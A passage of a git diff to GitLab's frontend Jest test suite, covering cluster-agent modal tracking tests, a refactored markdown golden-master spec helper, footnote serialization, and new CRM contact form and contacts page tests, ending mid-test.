b/spec/frontend/clusters_list/components/clusters_main_view_spec.js @@ -1,5 +1,6 @@ import { GlTabs, GlTab } from '@gitlab/ui'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import { mockTracking } from 'helpers/tracking_helper'; import ClustersMainView from '~/clusters_list/components/clusters_main_view.vue'; import InstallAgentModal from '~/clusters_list/components/install_agent_modal.vue'; import { @@ -8,12 +9,15 @@ import { CLUSTERS_TABS, MAX_CLUSTERS_LIST, MAX_LIST_COUNT, + EVENT_LABEL_TABS, + EVENT_ACTIONS_CHANGE, } from '~/clusters_list/constants'; const defaultBranchName = 'default-branch'; describe('ClustersMainViewComponent', () => { let wrapper; + let trackingSpy; const propsData = { defaultBranchName, @@ -23,6 +27,7 @@ describe('ClustersMainViewComponent', () => { wrapper = shallowMountExtended(ClustersMainView, { propsData, }); + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); }); afterEach(() => { @@ -54,10 +59,10 @@ describe('ClustersMainViewComponent', () => { describe('tabs', () => { it.each` - tabTitle | queryParamValue | lineNumber - ${'All'} | ${'all'} | ${0} - ${'Agent'} | ${AGENT} | ${1} - ${'Certificate based'} | ${CERTIFICATE_BASED} | ${2} + tabTitle | queryParamValue | lineNumber + ${'All'} | ${'all'} | ${0} + ${'Agent'} | ${AGENT} | ${1} + ${'Certificate'} | ${CERTIFICATE_BASED} | ${2} `( 'renders correct tab title and query param value', ({ tabTitle, queryParamValue, lineNumber }) => { @@ -71,6 +76,7 @@ describe('ClustersMainViewComponent', () => { beforeEach(() => { findComponent().vm.$emit('changeTab', AGENT); }); + it('changes the tab', () => { expect(findTabs().attributes('value')).toBe('1'); }); @@ -78,5 +84,13 @@ describe('ClustersMainViewComponent', () => { it('passes correct max-agents param to the modal', () => { expect(findModal().props('maxAgents')).toBe(MAX_LIST_COUNT); }); + + it('sends the correct tracking event', () => { + findTabs().vm.$emit('input', 1); + expect(trackingSpy).toHaveBeenCalledWith(undefined, EVENT_ACTIONS_CHANGE, { + label: EVENT_LABEL_TABS, + property: AGENT, + }); + }); }); }); diff --git a/spec/frontend/clusters_list/components/install_agent_modal_spec.js b/spec/frontend/clusters_list/components/install_agent_modal_spec.js index 6c2ea45b99b..4d1429c9e50 100644 --- a/spec/frontend/clusters_list/components/install_agent_modal_spec.js +++ b/spec/frontend/clusters_list/components/install_agent_modal_spec.js @@ -1,10 +1,21 @@ import { GlAlert, GlButton, GlFormInputGroup } from '@gitlab/ui'; -import { createLocalVue, shallowMount } from '@vue/test-utils'; +import { createLocalVue } from '@vue/test-utils'; import VueApollo from 'vue-apollo'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import { mockTracking } from 'helpers/tracking_helper'; import AvailableAgentsDropdown from '~/clusters_list/components/available_agents_dropdown.vue'; import InstallAgentModal from '~/clusters_list/components/install_agent_modal.vue'; -import { I18N_INSTALL_AGENT_MODAL, MAX_LIST_COUNT } from '~/clusters_list/constants'; +import { + I18N_AGENT_MODAL, + MAX_LIST_COUNT, + EVENT_LABEL_MODAL, + EVENT_ACTIONS_OPEN, + EVENT_ACTIONS_SELECT, + MODAL_TYPE_EMPTY, + MODAL_TYPE_REGISTER, +} from '~/clusters_list/constants'; import getAgentsQuery from '~/clusters_list/graphql/queries/get_agents.query.graphql'; +import getAgentConfigurations from '~/clusters_list/graphql/queries/agent_configurations.query.graphql'; import createAgentMutation from '~/clusters_list/graphql/mutations/create_agent.mutation.graphql'; import createAgentTokenMutation from '~/clusters_list/graphql/mutations/create_agent_token.mutation.graphql'; import createMockApollo from 'helpers/mock_apollo_helper'; @@ -23,14 +34,28 @@ const localVue = createLocalVue(); localVue.use(VueApollo); const projectPath = 'path/to/project'; +const kasAddress = 'kas.example.com'; +const kasEnabled = true; +const emptyStateImage = 'path/to/image'; const defaultBranchName = 'default'; const maxAgents = MAX_LIST_COUNT; describe('InstallAgentModal', () => { let wrapper; let apolloProvider; + let trackingSpy; + + const configurations = [{ agentName: 'agent-name' }]; + const apolloQueryResponse = { + data: { + project: { + id: '1', + clusterAgents: { nodes: [] }, + agentConfigurations: { nodes: configurations }, + }, + }, + }; - const i18n = I18N_INSTALL_AGENT_MODAL; const findModal = () => wrapper.findComponent(ModalStub); const findAgentDropdown = () => findModal().findComponent(AvailableAgentsDropdown); const findAlert = () => findModal().findComponent(GlAlert); @@ -40,6 +65,8 @@ describe('InstallAgentModal', () => { .wrappers.find((button) => button.props('variant') === variant); const findActionButton = () => findButtonByVariant('confirm'); const findCancelButton = () => findButtonByVariant('default'); + const findSecondaryButton = () => wrapper.findByTestId('agent-secondary-button'); + const findImage = () => wrapper.findByRole('img', { alt: I18N_AGENT_MODAL.empty_state.altText }); const expectDisabledAttribute = (element, disabled) => { if (disabled) { @@ -52,7 +79,9 @@ describe('InstallAgentModal', () => { const createWrapper = () => { const provide = { projectPath, - kasAddress: 'kas.example.com', + kasAddress, + kasEnabled, + emptyStateImage, }; const propsData = { @@ -60,7 +89,7 @@ describe('InstallAgentModal', () => { maxAgents, }; - wrapper = shallowMount(InstallAgentModal, { + wrapper = shallowMountExtended(InstallAgentModal, { attachTo: document.body, stubs: { GlModal: ModalStub, @@ -85,10 +114,12 @@ describe('InstallAgentModal', () => { }); }; - const mockSelectedAgentResponse = () => { + const mockSelectedAgentResponse = async () => { createWrapper(); writeQuery(); + await wrapper.vm.$nextTick(); + wrapper.vm.setAgentName('agent-name'); findActionButton().vm.$emit('click'); @@ -96,120 +127,182 @@ describe('InstallAgentModal', () => { }; beforeEach(() => { + apolloProvider = createMockApollo([ + [getAgentConfigurations, jest.fn().mockResolvedValue(apolloQueryResponse)], + ]); createWrapper(); + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); }); afterEach(() => { wrapper.destroy(); - wrapper = null; apolloProvider = null; }); - describe('initial state', () => { - it('renders the dropdown for available agents', () => { - expect(findAgentDropdown().isVisible()).toBe(true); - expect(findModal().text()).not.toContain(i18n.basicInstallTitle); - expect(findModal().findComponent(GlFormInputGroup).exists()).toBe(false); - expect(findModal().findComponent(GlAlert).exists()).toBe(false); - expect(findModal().findComponent(CodeBlock).exists()).toBe(false); - }); + describe('when agent configurations are present', () => { + const i18n = I18N_AGENT_MODAL.agent_registration; - it('renders a cancel button', () => { - expect(findCancelButton().isVisible()).toBe(true); - expectDisabledAttribute(findCancelButton(), false); - }); + describe('initial state', () => { + it('renders the dropdown for available agents', () => { + expect(findAgentDropdown().isVisible()).toBe(true); + expect(findModal().text()).not.toContain(i18n.basicInstallTitle); + expect(findModal().findComponent(GlFormInputGroup).exists()).toBe(false); + expect(findModal().findComponent(GlAlert).exists()).toBe(false); + expect(findModal().findComponent(CodeBlock).exists()).toBe(false); + }); - it('renders a disabled next button', () => { - expect(findActionButton().isVisible()).toBe(true); - expect(findActionButton().text()).toBe(i18n.registerAgentButton); - expectDisabledAttribute(findActionButton(), true); - }); - }); + it('renders a cancel button', () => { + expect(findCancelButton().isVisible()).toBe(true); + expectDisabledAttribute(findCancelButton(), false); + }); - describe('an agent is selected', () => { - beforeEach(() => { - findAgentDropdown().vm.$emit('agentSelected'); - }); + it('renders a disabled next button', () => { + expect(findActionButton().isVisible()).toBe(true); + expect(findActionButton().text()).toBe(i18n.registerAgentButton); + expectDisabledAttribute(findActionButton(), true); + }); - it('enables the next button', () => { - expect(findActionButton().isVisible()).toBe(true); - expectDisabledAttribute(findActionButton(), false); + it('sends the event with the modalType', () => { + findModal().vm.$emit('show'); + expect(trackingSpy).toHaveBeenCalledWith(undefined, EVENT_ACTIONS_OPEN, { + label: EVENT_LABEL_MODAL, + property: MODAL_TYPE_REGISTER, + }); + }); }); - }); - describe('registering an agent', () => { - const createAgentHandler = jest.fn().mockResolvedValue(createAgentResponse); - const createAgentTokenHandler = jest.fn().mockResolvedValue(createAgentTokenResponse); + describe('an agent is selected', () => { + beforeEach(() => { + findAgentDropdown().vm.$emit('agentSelected'); + }); - beforeEach(() => { - apolloProvider = createMockApollo([ - [createAgentMutation, createAgentHandler], - [createAgentTokenMutation, createAgentTokenHandler], - ]); + it('enables the next button', () => { + expect(findActionButton().isVisible()).toBe(true); + expectDisabledAttribute(findActionButton(), false); + }); - return mockSelectedAgentResponse(apolloProvider); + it('sends the correct tracking event', () => { + expect(trackingSpy).toHaveBeenCalledWith(undefined, EVENT_ACTIONS_SELECT, { + label: EVENT_LABEL_MODAL, + }); + }); }); - it('creates an agent and token', () => { - expect(createAgentHandler).toHaveBeenCalledWith({ - input: { name: 'agent-name', projectPath }, - }); + describe('registering an agent', () => { + const createAgentHandler = jest.fn().mockResolvedValue(createAgentResponse); + const createAgentTokenHandler = jest.fn().mockResolvedValue(createAgentTokenResponse); - expect(createAgentTokenHandler).toHaveBeenCalledWith({ - input: { clusterAgentId: 'agent-id', name: 'agent-name' }, + beforeEach(() => { + apolloProvider = createMockApollo([ + [getAgentConfigurations, jest.fn().mockResolvedValue(apolloQueryResponse)], + [createAgentMutation, createAgentHandler], + [createAgentTokenMutation, createAgentTokenHandler], + ]); + + return mockSelectedAgentResponse(); }); - }); - it('renders a close button', () => { - expect(findActionButton().isVisible()).toBe(true); - expect(findActionButton().text()).toBe(i18n.close); - expectDisabledAttribute(findActionButton(), false); - }); + it('creates an agent and token', () => { + expect(createAgentHandler).toHaveBeenCalledWith({ + input: { name: 'agent-name', projectPath }, + }); - it('shows agent instructions', () => { - const modalText = findModal().text(); - expect(modalText).toContain(i18n.basicInstallTitle); - expect(modalText).toContain(i18n.basicInstallBody); + expect(createAgentTokenHandler).toHaveBeenCalledWith({ + input: { clusterAgentId: 'agent-id', name: 'agent-name' }, + }); + }); - const token = findModal().findComponent(GlFormInputGroup); - expect(token.props('value')).toBe('mock-agent-token'); + it('renders a close button', () => { + expect(findActionButton().isVisible()).toBe(true); + expect(findActionButton().text()).toBe(i18n.close); + expectDisabledAttribute(findActionButton(), false); + }); - const alert = findModal().findComponent(GlAlert); - expect(alert.props('title')).toBe(i18n.tokenSingleUseWarningTitle); + it('shows agent instructions', () => { + const modalText = findModal().text(); + expect(modalText).toContain(i18n.basicInstallTitle); + expect(modalText).toContain(i18n.basicInstallBody); - const code = findModal().findComponent(CodeBlock).props('code'); - expect(code).toContain('--agent-token=mock-agent-token'); - expect(code).toContain('--kas-address=kas.example.com'); - }); + const token = findModal().findComponent(GlFormInputGroup); + expect(token.props('value')).toBe('mock-agent-token'); - describe('error creating agent', () => { - beforeEach(() => { - apolloProvider = createMockApollo([ - [createAgentMutation, jest.fn().mockResolvedValue(createAgentErrorResponse)], - ]); + const alert = findModal().findComponent(GlAlert); + expect(alert.props('title')).toBe(i18n.tokenSingleUseWarningTitle); - return mockSelectedAgentResponse(); + const code = findModal().findComponent(CodeBlock).props('code'); + expect(code).toContain('--agent-token=mock-agent-token'); + expect(code).toContain('--kas-address=kas.example.com'); + }); + + describe('error creating agent', () => { + beforeEach(() => { + apolloProvider = createMockApollo([ + [getAgentConfigurations, jest.fn().mockResolvedValue(apolloQueryResponse)], + [createAgentMutation, jest.fn().mockResolvedValue(createAgentErrorResponse)], + ]); + + return mockSelectedAgentResponse(); + }); + + it('displays the error message', () => { + expect(findAlert().text()).toBe( + createAgentErrorResponse.data.createClusterAgent.errors[0], + ); + }); }); - it('displays the error message', () => { - expect(findAlert().text()).toBe(createAgentErrorResponse.data.createClusterAgent.errors[0]); + describe('error creating token', () => { + beforeEach(() => { + apolloProvider = createMockApollo([ + [getAgentConfigurations, jest.fn().mockResolvedValue(apolloQueryResponse)], + [createAgentMutation, jest.fn().mockResolvedValue(createAgentResponse)], + [createAgentTokenMutation, jest.fn().mockResolvedValue(createAgentTokenErrorResponse)], + ]); + + return mockSelectedAgentResponse(); + }); + + it('displays the error message', async () => { + expect(findAlert().text()).toBe( + createAgentTokenErrorResponse.data.clusterAgentTokenCreate.errors[0], + ); + }); }); }); + }); - describe('error creating token', () => { - beforeEach(() => { - apolloProvider = createMockApollo([ - [createAgentMutation, jest.fn().mockResolvedValue(createAgentResponse)], - [createAgentTokenMutation, jest.fn().mockResolvedValue(createAgentTokenErrorResponse)], - ]); + describe('when there are no agent configurations present', () => { + const i18n = I18N_AGENT_MODAL.empty_state; + const apolloQueryEmptyResponse = { + data: { + project: { + clusterAgents: { nodes: [] }, + agentConfigurations: { nodes: [] }, + }, + }, + }; - return mockSelectedAgentResponse(); - }); + beforeEach(() => { + apolloProvider = createMockApollo([ + [getAgentConfigurations, jest.fn().mockResolvedValue(apolloQueryEmptyResponse)], + ]); + createWrapper(); + }); + + it('renders empty state image', () => { + expect(findImage().attributes('src')).toBe(emptyStateImage); + }); + + it('renders a secondary button', () => { + expect(findSecondaryButton().isVisible()).toBe(true); + expect(findSecondaryButton().text()).toBe(i18n.secondaryButton); + }); - it('displays the error message', () => { - expect(findAlert().text()).toBe( - createAgentTokenErrorResponse.data.clusterAgentTokenCreate.errors[0], - ); + it('sends the event with the modalType', () => { + findModal().vm.$emit('show'); + expect(trackingSpy).toHaveBeenCalledWith(undefined, EVENT_ACTIONS_OPEN, { + label: EVENT_LABEL_MODAL, + property: MODAL_TYPE_EMPTY, }); }); }); diff --git a/spec/frontend/clusters_list/mocks/apollo.js b/spec/frontend/clusters_list/mocks/apollo.js index 1a7ef84a6d9..804f9834506 100644 --- a/spec/frontend/clusters_list/mocks/apollo.js +++ b/spec/frontend/clusters_list/mocks/apollo.js @@ -65,6 +65,7 @@ export const createAgentTokenErrorResponse = { export const getAgentResponse = { data: { project: { + id: 'project-1', clusterAgents: { nodes: [{ ...agent, tokens }], pageInfo, count }, repository: { tree: { diff --git a/spec/frontend/code_navigation/components/__snapshots__/popover_spec.js.snap b/spec/frontend/code_navigation/components/__snapshots__/popover_spec.js.snap index 118d8ceceb9..97d9be110c8 100644 --- a/spec/frontend/code_navigation/components/__snapshots__/popover_spec.js.snap +++ b/spec/frontend/code_navigation/components/__snapshots__/popover_spec.js.snap @@ -42,6 +42,8 @@ exports[`Code navigation popover component renders popover 1`] = ` <span> main() { </span> + + <br /> </span> <span class="line" @@ -50,6 +52,8 @@ exports[`Code navigation popover component renders popover 1`] = ` <span> } </span> + + <br /> </span> </pre> </div> diff --git a/spec/frontend/content_editor/components/__snapshots__/toolbar_link_button_spec.js.snap b/spec/frontend/content_editor/components/__snapshots__/toolbar_link_button_spec.js.snap index 178c7d749c8..7abd6b422ad 100644 --- a/spec/frontend/content_editor/components/__snapshots__/toolbar_link_button_spec.js.snap +++ b/spec/frontend/content_editor/components/__snapshots__/toolbar_link_button_spec.js.snap @@ -19,7 +19,7 @@ exports[`content_editor/components/toolbar_link_button renders dropdown componen <div placeholder=\\"Link URL\\"> <div role=\\"group\\" class=\\"input-group\\"> <!----> - <!----> <input type=\\"text\\" placeholder=\\"Link URL\\" class=\\"gl-form-input form-control\\"> + <!----> <input type=\\"text\\" placeholder=\\"Link URL\\" class=\\"form-control gl-form-input\\"> <div class=\\"input-group-append\\"><button type=\\"button\\" class=\\"btn btn-confirm btn-md gl-button\\"> <!----> <!----> <span class=\\"gl-button-text\\">Apply</span></button></div> diff --git a/spec/frontend/content_editor/markdown_processing_examples.js b/spec/frontend/content_editor/markdown_processing_examples.js deleted file mode 100644 index da895970289..00000000000 --- a/spec/frontend/content_editor/markdown_processing_examples.js +++ /dev/null @@ -1,27 +0,0 @@ -import fs from 'fs'; -import path from 'path'; -import jsYaml from 'js-yaml'; -// eslint-disable-next-line import/no-deprecated -import { getJSONFixture } from 'helpers/fixtures'; - -export const loadMarkdownApiResult = (testName) => { - const fixturePathPrefix = `api/markdown/${testName}.json`; - - // eslint-disable-next-line import/no-deprecated - const fixture = getJSONFixture(fixturePathPrefix); - return fixture.body || fixture.html; -}; - -export const loadMarkdownApiExamples = () => { - const apiMarkdownYamlPath = path.join(__dirname, '..', 'fixtures', 'api_markdown.yml'); - const apiMarkdownYamlText = fs.readFileSync(apiMarkdownYamlPath); - const apiMarkdownExampleObjects = jsYaml.safeLoad(apiMarkdownYamlText); - - return apiMarkdownExampleObjects.map(({ name, context, markdown }) => [name, context, markdown]); -}; - -export const loadMarkdownApiExample = (testName) => { - return loadMarkdownApiExamples().find(([name, context]) => { - return (context ? `${context}_${name}` : name) === testName; - })[2]; -}; diff --git a/spec/frontend/content_editor/markdown_processing_spec.js b/spec/frontend/content_editor/markdown_processing_spec.js index 71565768558..3930f47289a 100644 --- a/spec/frontend/content_editor/markdown_processing_spec.js +++ b/spec/frontend/content_editor/markdown_processing_spec.js @@ -1,20 +1,16 @@ -import { createContentEditor } from '~/content_editor'; -import { loadMarkdownApiExamples, loadMarkdownApiResult } from './markdown_processing_examples'; +import path from 'path'; +import { describeMarkdownProcessing } from 'jest/content_editor/markdown_processing_spec_helper'; jest.mock('~/emoji'); -describe('markdown processing', () => { - // Ensure we generate same markdown that was provided to Markdown API. - it.each(loadMarkdownApiExamples())( - 'correctly handles %s (context: %s)', - async (name, context, markdown) => { - const testName = context ? `${context}_${name}` : name; - const contentEditor = createContentEditor({ - renderMarkdown: () => loadMarkdownApiResult(testName), - }); - await contentEditor.setSerializedContent(markdown); +const markdownYamlPath = path.join( + __dirname, + '..', + '..', + 'fixtures', + 'markdown', + 'markdown_golden_master_examples.yml', +); - expect(contentEditor.getSerializedContent()).toBe(markdown); - }, - ); -}); +// See spec/fixtures/markdown/markdown_golden_master_examples.yml for documentation on how this spec works. +describeMarkdownProcessing('CE markdown processing in ContentEditor', markdownYamlPath); diff --git a/spec/frontend/content_editor/markdown_processing_spec_helper.js b/spec/frontend/content_editor/markdown_processing_spec_helper.js new file mode 100644 index 00000000000..bb7ec0030a2 --- /dev/null +++ b/spec/frontend/content_editor/markdown_processing_spec_helper.js @@ -0,0 +1,86 @@ +import fs from 'fs'; +import jsYaml from 'js-yaml'; +import { memoize } from 'lodash'; +import { createContentEditor } from '~/content_editor'; +import { setTestTimeoutOnce } from 'helpers/timeout'; + +const getFocusedMarkdownExamples = memoize( + () => process.env.FOCUSED_MARKDOWN_EXAMPLES?.split(',') || [], +); + +const includeExample = ({ name }) => { + const focusedMarkdownExamples = getFocusedMarkdownExamples(); + if (!focusedMarkdownExamples.length) { + return true; + } + return focusedMarkdownExamples.includes(name); +}; + +const getPendingReason = (pendingStringOrObject) => { + if (!pendingStringOrObject) { + return null; + } + if (typeof pendingStringOrObject === 'string') { + return pendingStringOrObject; + } + if (pendingStringOrObject.frontend) { + return pendingStringOrObject.frontend; + } + + return null; +}; + +const loadMarkdownApiExamples = (markdownYamlPath) => { + const apiMarkdownYamlText = fs.readFileSync(markdownYamlPath); + const apiMarkdownExampleObjects = jsYaml.safeLoad(apiMarkdownYamlText); + + return apiMarkdownExampleObjects + .filter(includeExample) + .map(({ name, pending, markdown, html }) => [ + name, + { pendingReason: getPendingReason(pending), markdown, html }, + ]); +}; + +const testSerializesHtmlToMarkdownForElement = async ({ markdown, html }) => { + const contentEditor = createContentEditor({ + // Overwrite renderMarkdown to always return this specific html + renderMarkdown: () => html, + }); + + await contentEditor.setSerializedContent(markdown); + + // This serializes the ContentEditor document, which was based on the HTML, to markdown + const serializedContent = contentEditor.getSerializedContent(); + + // Assert that the markdown we ended up with after sending it through all the ContentEditor + // plumbing matches the original markdown from the YAML. + expect(serializedContent).toBe(markdown); +}; + +// describeMarkdownProcesssing +// +// This is used to dynamically generate examples (for both CE and EE) to ensure +// we generate same markdown that was provided to Markdown API. +// +// eslint-disable-next-line jest/no-export +export const describeMarkdownProcessing = (description, markdownYamlPath) => { + const examples = loadMarkdownApiExamples(markdownYamlPath); + + describe(description, () => { + describe.each(examples)('%s', (name, { pendingReason, ...example }) => { + const exampleName = 'correctly serializes HTML to markdown'; + if (pendingReason) { + it.todo(`${exampleName}: ${pendingReason}`); + return; + } + + it(exampleName, async () => { + if (name === 'frontmatter_toml') { + setTestTimeoutOnce(2000); + } + await testSerializesHtmlToMarkdownForElement(example); + }); + }); + }); +}; diff --git a/spec/frontend/content_editor/services/markdown_serializer_spec.js b/spec/frontend/content_editor/services/markdown_serializer_spec.js index cfd93c2df10..97f6d8f6334 100644 --- a/spec/frontend/content_editor/services/markdown_serializer_spec.js +++ b/spec/frontend/content_editor/services/markdown_serializer_spec.js @@ -11,6 +11,9 @@ import Division from '~/content_editor/extensions/division'; import Emoji from '~/content_editor/extensions/emoji'; import Figure from '~/content_editor/extensions/figure'; import FigureCaption from '~/content_editor/extensions/figure_caption'; +import FootnoteDefinition from '~/content_editor/extensions/footnote_definition'; +import FootnoteReference from '~/content_editor/extensions/footnote_reference'; +import FootnotesSection from '~/content_editor/extensions/footnotes_section'; import HardBreak from '~/content_editor/extensions/hard_break'; import Heading from '~/content_editor/extensions/heading'; import HorizontalRule from '~/content_editor/extensions/horizontal_rule'; @@ -28,7 +31,6 @@ import TableHeader from '~/content_editor/extensions/table_header'; import TableRow from '~/content_editor/extensions/table_row'; import TaskItem from '~/content_editor/extensions/task_item'; import TaskList from '~/content_editor/extensions/task_list'; -import Text from '~/content_editor/extensions/text'; import markdownSerializer from '~/content_editor/services/markdown_serializer'; import { createTestEditor, createDocBuilder } from '../test_utils'; @@ -47,6 +49,9 @@ const tiptapEditor = createTestEditor({ DetailsContent, Division, Emoji, + FootnoteDefinition, + FootnoteReference, + FootnotesSection, Figure, FigureCaption, HardBreak, @@ -58,7 +63,6 @@ const tiptapEditor = createTestEditor({ Link, ListItem, OrderedList, - Paragraph, Strike, Table, TableCell, @@ -66,7 +70,6 @@ const tiptapEditor = createTestEditor({ TableRow, TaskItem, TaskList, - Text, ], }); @@ -84,6 +87,9 @@ const { descriptionItem, descriptionList, emoji, + footnoteDefinition, + footnoteReference, + footnotesSection, figure, figureCaption, heading, @@ -120,6 +126,9 @@ const { emoji: { markType: Emoji.name }, figure: { nodeType: Figure.name }, figureCaption: { nodeType: FigureCaption.name }, + footnoteDefinition: { nodeType: FootnoteDefinition.name }, + footnoteReference: { nodeType: FootnoteReference.name }, + footnotesSection: { nodeType: FootnotesSection.name }, hardBreak: { nodeType: HardBreak.name }, heading: { nodeType: Heading.name }, horizontalRule: { nodeType: HorizontalRule.name }, @@ -1108,4 +1117,22 @@ there `.trim(), ); }); + + it('correctly serializes footnotes', () => { + expect( + serialize( + paragraph( + 'Oranges are orange ', + footnoteReference({ footnoteId: '1', footnoteNumber: '1' }), + ), + footnotesSection(footnoteDefinition(paragraph('Oranges are fruits'))), + ), + ).toBe( + ` +Oranges are orange [^1] + +[^1]: Oranges are fruits + `.trim(), + ); + }); }); diff --git a/spec/frontend/crm/contact_form_spec.js b/spec/frontend/crm/contact_form_spec.js new file mode 100644 index 00000000000..b2753ad8cf5 --- /dev/null +++ b/spec/frontend/crm/contact_form_spec.js @@ -0,0 +1,157 @@ +import { GlAlert } from '@gitlab/ui'; +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import ContactForm from '~/crm/components/contact_form.vue'; +import createContactMutation from '~/crm/components/queries/create_contact.mutation.graphql'; +import updateContactMutation from '~/crm/components/queries/update_contact.mutation.graphql'; +import getGroupContactsQuery from '~/crm/components/queries/get_group_contacts.query.graphql'; +import { + createContactMutationErrorResponse, + createContactMutationResponse, + getGroupContactsQueryResponse, + updateContactMutationErrorResponse, + updateContactMutationResponse, +} from './mock_data'; + +describe('Customer relations contact form component', () => { + Vue.use(VueApollo); + let wrapper; + let fakeApollo; + let mutation; + let queryHandler; + + const findSaveContactButton = () => wrapper.findByTestId('save-contact-button'); + const findCancelButton = () => wrapper.findByTestId('cancel-button'); + const findForm = () => wrapper.find('form'); + const findError = () => wrapper.findComponent(GlAlert); + + const mountComponent = ({ mountFunction = shallowMountExtended, editForm = false } = {}) => { + fakeApollo = createMockApollo([[mutation, queryHandler]]); + fakeApollo.clients.defaultClient.cache.writeQuery({ + query: getGroupContactsQuery, + variables: { groupFullPath: 'flightjs' }, + data: getGroupContactsQueryResponse.data, + }); + const propsData = { drawerOpen: true }; + if (editForm) + propsData.contact = { firstName: 'First', lastName: 'Last', email: 'email@example.com' }; + wrapper = mountFunction(ContactForm, { + provide: { groupId: 26, groupFullPath: 'flightjs' }, + apolloProvider: fakeApollo, + propsData, + }); + }; + + beforeEach(() => { + mutation = createContactMutation; + queryHandler = jest.fn().mockResolvedValue(createContactMutationResponse); + }); + + afterEach(() => { + wrapper.destroy(); + fakeApollo = null; + }); + + describe('Save contact button', () => { + it('should be disabled when required fields are empty', () => { + mountComponent(); + + expect(findSaveContactButton().props('disabled')).toBe(true); + }); + + it('should not be disabled when required fields have values', async () => { + mountComponent(); + + wrapper.find('#contact-first-name').vm.$emit('input', 'A'); + wrapper.find('#contact-last-name').vm.$emit('input', 'B'); + wrapper.find('#contact-email').vm.$emit('input', 'C'); + await waitForPromises(); + + expect(findSaveContactButton().props('disabled')).toBe(false); + }); + }); + + it("should emit 'close' when cancel button is clicked", () => { + mountComponent(); + + findCancelButton().vm.$emit('click'); + + expect(wrapper.emitted().close).toBeTruthy(); + }); + + describe('when create mutation is successful', () => { + it("should emit 'close'", async () => { + mountComponent(); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(wrapper.emitted().close).toBeTruthy(); + }); + }); + + describe('when create mutation fails', () => { + it('should show error on reject', async () => { + queryHandler = jest.fn().mockRejectedValue('ERROR'); + mountComponent(); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(findError().exists()).toBe(true); + }); + + it('should show error on error response', async () => { + queryHandler = jest.fn().mockResolvedValue(createContactMutationErrorResponse); + mountComponent(); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(findError().exists()).toBe(true); + expect(findError().text()).toBe('Phone is invalid.'); + }); + }); + + describe('when update mutation is successful', () => { + it("should emit 'close'", async () => { + mutation = updateContactMutation; + queryHandler = jest.fn().mockResolvedValue(updateContactMutationResponse); + mountComponent({ editForm: true }); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(wrapper.emitted().close).toBeTruthy(); + }); + }); + + describe('when update mutation fails', () => { + beforeEach(() => { + mutation = updateContactMutation; + }); + + it('should show error on reject', async () => { + queryHandler = jest.fn().mockRejectedValue('ERROR'); + mountComponent({ editForm: true }); + findForm().trigger('submit'); + await waitForPromises(); + + expect(findError().exists()).toBe(true); + }); + + it('should show error on error response', async () => { + queryHandler = jest.fn().mockResolvedValue(updateContactMutationErrorResponse); + mountComponent({ editForm: true }); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(findError().exists()).toBe(true); + expect(findError().text()).toBe('Email is invalid.'); + }); + }); +}); diff --git a/spec/frontend/crm/contacts_root_spec.js b/spec/frontend/crm/contacts_root_spec.js index 79b85969eb4..b30349305a3 100644 --- a/spec/frontend/crm/contacts_root_spec.js +++ b/spec/frontend/crm/contacts_root_spec.js @@ -1,39 +1,65 @@ -import { GlLoadingIcon } from '@gitlab/ui'; +import { GlAlert, GlLoadingIcon } from '@gitlab/ui'; import Vue from 'vue'; import VueApollo from 'vue-apollo'; +import VueRouter from 'vue-router'; import { mountExtended, shallowMountExtended } from 'helpers/vue_test_utils_helper'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; -import createFlash from '~/flash'; import ContactsRoot from '~/crm/components/contacts_root.vue'; +import ContactForm from '~/crm/components/contact_form.vue'; import getGroupContactsQuery from '~/crm/components/queries/get_group_contacts.query.graphql'; +import { NEW_ROUTE_NAME, EDIT_ROUTE_NAME } from '~/crm/constants'; +import routes from '~/crm/routes'; import { getGroupContactsQueryResponse } from './mock_data'; -jest.mock('~/flash'); - describe('Customer relations contacts root app', () => { Vue.use(VueApollo); + Vue.use(VueRouter); let wrapper; let fakeApollo; + let router; const findLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); const findRowByName = (rowName) => wrapper.findAllByRole('row', { name: rowName }); + const findIssuesLinks = () => wrapper.findAllByTestId('issues-link'); + const findNewContactButton = () => wrapper.findByTestId('new-contact-button'); + const findEditContactButton = () => wrapper.findByTestId('edit-contact-button'); + const findContactForm = () => wrapper.findComponent(ContactForm); + const findError = () => wrapper.findComponent(GlAlert); const successQueryHandler = jest.fn().mockResolvedValue(getGroupContactsQueryResponse); + const basePath = '/groups/flightjs/-/crm/contacts'; + const mountComponent = ({ queryHandler = successQueryHandler, mountFunction = shallowMountExtended, + canAdminCrmContact = true, } = {}) => { fakeApollo = createMockApollo([[getGroupContactsQuery, queryHandler]]); wrapper = mountFunction(ContactsRoot, { - provide: { groupFullPath: 'flightjs' }, + router, + provide: { + groupFullPath: 'flightjs', + groupIssuesPath: '/issues', + groupId: 26, + canAdminCrmContact, + }, apolloProvider: fakeApollo, }); }; + beforeEach(() => { + router = new VueRouter({ + base: basePath, + mode: 'history', + routes, + }); + }); + afterEach(() => { wrapper.destroy(); fakeApollo = null; + router = null; }); it('should render loading spinner', () => { @@ -42,19 +68,113 @@ describe('Customer relations contacts root app', () => { expect(findLoadingIcon().exists()).toBe(true); }); - it('should render error message on reject', async () => { - mountComponent({ queryHandler: jest.fn().mockRejectedValue('ERROR') }); - await waitForPromises(); + describe('new contact button', () => { + it('should exist when user has permission', () => { + mountComponent(); + + expect(findNewContactButton().exists()).toBe(true); + }); + + it('should not exist when user has no permission', () => { + mountComponent({ canAdminCrmContact: false }); + + expect(findNewContactButton().exists()).toBe(false); + }); + }); + + describe('contact form', () => { + it('should not exist by default', async () => { + mountComponent(); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(false); + }); + + it('should exist when user clicks new contact button', async () => { + mountComponent(); + + findNewContactButton().vm.$emit('click'); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(true); + }); + + it('should exist when user navigates directly to 